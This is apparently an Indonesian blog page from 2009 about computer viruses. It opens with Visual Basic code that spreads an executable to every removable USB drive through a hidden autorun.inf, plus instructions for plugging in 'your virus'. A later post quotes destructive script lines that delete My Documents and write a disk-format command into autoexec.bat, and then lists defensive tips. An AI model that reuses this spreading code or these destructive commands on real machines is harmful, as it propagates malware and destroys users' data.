Code:Public Function InfeksiUSB(DigitalCat As String, AD As String) Dim FSO, USBCatLER, USBCat Set FSO = CreateObject("SCRIPTING.FILESYSTEMOBJECT") Set USBCatLER = FSO.DRIVES For Each USBCat In USBCatLER If USBCat.DRIVETYPE = 1 Then 'EGER SILINEBILIR ISE If Right(YOL, 1) <> "\" Then DigitalCat= DigitalCat& "\" If DigitalUSB(USBCat & "\autorun.inf") Then SetAttr USBCat & "\autorun.inf", 0 Kill USBCat & "\autorun.inf" End If Open USBCat & "\autorun.inf" For Append As #1 Print #1, "[autorun]" & vbCrLf & _ "open=" & USBCat & "\" & AD Close #1 If Not DigitalUSB(USBCat & "\" & AD) Then FileCopy DigitalCat& AD, USBCat & "\" & AD End If SetAttr USBCat & "\" & AD, 4 SetAttr USBCat & "\autorun.inf", 4 SetAttr USBCat & "\" & AD, 2 SetAttr USBCat & "\autorun.inf", 2 End If Next End Function Public Function DigitalUSB(DosyaAdi As String) As Boolean On Error GoTo CekUSB Call FileLen(DosyaAdi) DigitalUSB = True Exit Function CekUSB: End Function Sub Main() InfeksiUSB App.Path, App.EXEName & ".exe" End Sub Cara Pakai : Pada code ini (ada .exe,-> letakkan nama virus kamu bisa jg diganti *.Vbs,etc..) InfeksiUSB App.Path, App.EXEName & ".exe" pada form load / dimana code virus kamu letakkan untuk mengaktifkan virus kamu cukup gunakan / panggiljika code ini di letakkan di module : gunakan code ini :Code:call InfeksiUSBCode:NamaModule.InfeksiUSB
Selasa, 08 Desember 2009
wss.Run(’deltree /y c:\mydocu~1′);
sfso.CreateTextFile(’c:\autoexec.bat’,true).WriteLine(’format c:/u/q’);
alert(‘Wait a moment.’);
Ada script virus yang hasilnya bisa menghapus seluruh isi directory c:\mydocu~1 kemudian merubah file AUTOEXEC.BAT komputer menjadi berisi instruksi untuk memformat hard disk.
Masih banyak lagi variasi dan kemungkinan suatu virus script melakukan aksinya oleh karena itu hal ini tidak boleh diremehkan begitu saja.
Penanggulangannya :
- Tingkatkan options security dari browser setiap kali kita merasa memasuki alamat internet yang berbahaya.
- Set agar setiap kali browser menemukan suatu script agar selalu muncul pilihan apakah script itu ingin dijalankan atau tidak. Jadi kita bisa menyelidiki terlebih dahulu apakah sisi dari script tersebut berbahaya.
- Set atribut menjadi read-only untuk file-file yang rawan dan memegang kendali penting seperti : AUTOEXEC.BAT; DOSSTART.BAT dan sebagainya.
- Ubah nama program file yang rawan dan memegang kendali penting menjadi tidak standar seperti : FORMAT.EXE;DEBUG.EXE ; DELTREE.EXE dan sebagainya
- Periksa secara rutin registry Windows di bagian \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, apakah menemukan sesuatu yang mencurigakan jika menemukan itu hapus bagian yang mencurigakan itu.
- Selalu membuat file cadangan dari registry Windows.
Semoga info ini bermanfaat..